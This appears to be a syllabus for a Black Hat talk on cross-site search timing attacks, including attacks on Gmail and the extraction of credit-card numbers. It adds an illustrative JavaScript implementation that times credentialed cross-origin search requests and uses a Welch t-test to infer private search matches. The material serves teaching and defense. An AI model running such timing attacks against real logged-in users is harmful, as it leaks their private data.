Syllabus
Introduction
Title
Agenda
Background
Attacker Example
Advanced Cross-Site Search Attacks
Basic Cross-Site Search Attack Flow
Step 1 Challenge Search Request
Step 2 Dummy Search Request
Step 2 Challenge Search Request
Step 1 Statistical Tests
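The basic attack flow listed above (a challenge search request, a dummy search request, and a statistical test on the two timings) as an added JavaScript example. This is illustrative code written for this page, not code from the Black Hat talk or its authors. The search URL, the search terms, the decision threshold and the timing samples are constructed assumptions; the measurement helpers run only inside a browser, while the statistical decision runs anywhere.

```javascript
// Added illustration of a basic cross-site search (XS-Search) timing attack.
// Not code from the talk; URLs, terms and sample timings are constructed.

// Time one cross-origin search request from the attacker's page. With
// credentials: 'include' the victim's cookies go along, so the search runs
// against the victim's account; mode 'no-cors' means the body is opaque to us,
// but the time until the response arrives still reflects its size.
// (Browser only; not exercised by the offline test.)
async function timeSearch(url) {
  const start = performance.now();
  await fetch(url, { mode: 'no-cors', credentials: 'include', cache: 'no-store' });
  return performance.now() - start;
}

// Collect paired samples: each round issues the challenge search (the term
// whose presence in the victim's data we want to learn) and a dummy search
// (a term that matches nothing), so network drift hits both series alike.
// searchUrl is an assumed endpoint prefix such as 'https://mail.example/search?q='.
async function collectSamples(searchUrl, challenge, dummy, rounds) {
  const challengeTimes = [];
  const dummyTimes = [];
  for (let i = 0; i < rounds; i++) {
    challengeTimes.push(await timeSearch(searchUrl + encodeURIComponent(challenge)));
    dummyTimes.push(await timeSearch(searchUrl + encodeURIComponent(dummy)));
  }
  return { challengeTimes, dummyTimes };
}

// Statistical test: Welch's t statistic between the two timing series. A large
// positive value means the challenge responses were consistently slower,
// i.e. the search matched records (an inflated match widens this gap).
function mean(xs) {
  return xs.reduce((a, b) => a + b, 0) / xs.length;
}
function variance(xs) {
  const m = mean(xs);
  return xs.reduce((a, b) => a + (b - m) ** 2, 0) / (xs.length - 1);
}
function welchT(a, b) {
  return (mean(a) - mean(b)) / Math.sqrt(variance(a) / a.length + variance(b) / b.length);
}

// Decide whether the challenge term matched. The threshold is an assumption:
// about 2.5 is roughly a one-sided p < 0.01 for ten samples per series.
function termMatched(challengeTimes, dummyTimes, threshold = 2.5) {
  return welchT(challengeTimes, dummyTimes) > threshold;
}

// Constructed timing samples in milliseconds (not measured data). The first
// pair imitates a matching, inflated response; the second a non-matching term.
const matchedSample = {
  challengeTimes: [118, 124, 131, 120, 127, 133, 119, 125, 129, 122],
  dummyTimes:     [ 92,  97,  89,  95, 101,  90,  94,  98,  91,  96],
};
const unmatchedSample = {
  challengeTimes: [ 93,  96,  91,  99,  90,  95,  97,  92,  94, 100],
  dummyTimes:     [ 92,  97,  89,  95, 101,  90,  94,  98,  91,  96],
};

console.log('matched term detected:', termMatched(matchedSample.challengeTimes, matchedSample.dummyTimes));
console.log('unmatched term detected:', termMatched(unmatchedSample.challengeTimes, unmatchedSample.dummyTimes));
```

In a real run, `collectSamples` would be called from the attacker's page while the victim is logged in to the search service, and the decision would be repeated per candidate term; the dummy series is what lets the test separate response-size differences from ordinary latency noise.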
Challenges
Response Inflation
Attack on Gmail
Two new attack vectors
Browser-based timing attacks
Classical timing attacks
Algorithmic improvements
Evaluation
Example
Browser-based Optimization
Improved Accuracy
Demo
Limitations
Second Order Attack
Simple Attack
Simple Attack Flow
Inflating Second Order Attack
Extending the Model
How to create an inflating record
Extracting credit card numbers
Sending requests for autocomplete suggestions
Attacked account example
Attacked account demo
Attack success rate
Stealthy attack
Email services
Defenses
Conclusions
Questions
Taught by
Black Hat